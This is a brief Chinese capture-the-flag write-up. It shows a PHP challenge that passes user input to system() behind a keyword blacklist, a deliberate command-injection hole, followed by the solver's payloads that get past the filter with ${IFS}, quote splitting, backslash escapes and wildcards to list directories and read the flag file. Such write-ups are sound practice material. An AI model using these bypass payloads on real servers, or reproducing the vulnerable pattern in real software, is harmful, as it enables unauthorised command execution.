2
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:50:30
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}
过滤了;,cat,flag,0-9的数字,空格,*,more,less,head,sort,tail,sed,cut,awk,strings,od,curl,```,%,\x09,\x26,tac,<,>
兄弟,真的天都塌了,怎么<和>都给我过滤了,仔细一看,$居然没给我过滤,天无绝人之路我只能说
?c=t''ac${IFS}$fl''ag.p''hp||
不是哥们为什么没有爆flag啊,难道没有flag.php?
?c=ls||
这不是存在flag.php吗,后面我到处找空格过滤怎么绕过,尝试了十几次都没成功,突然想起来flag会不会在跟目录下面,遂尝试
?c=ls${IFS}/%0a
我嘞个真的在根目录下啊
<font style="color:rgb(33, 37, 41);">/?c=ca\t${IFS}/fla?||</font>
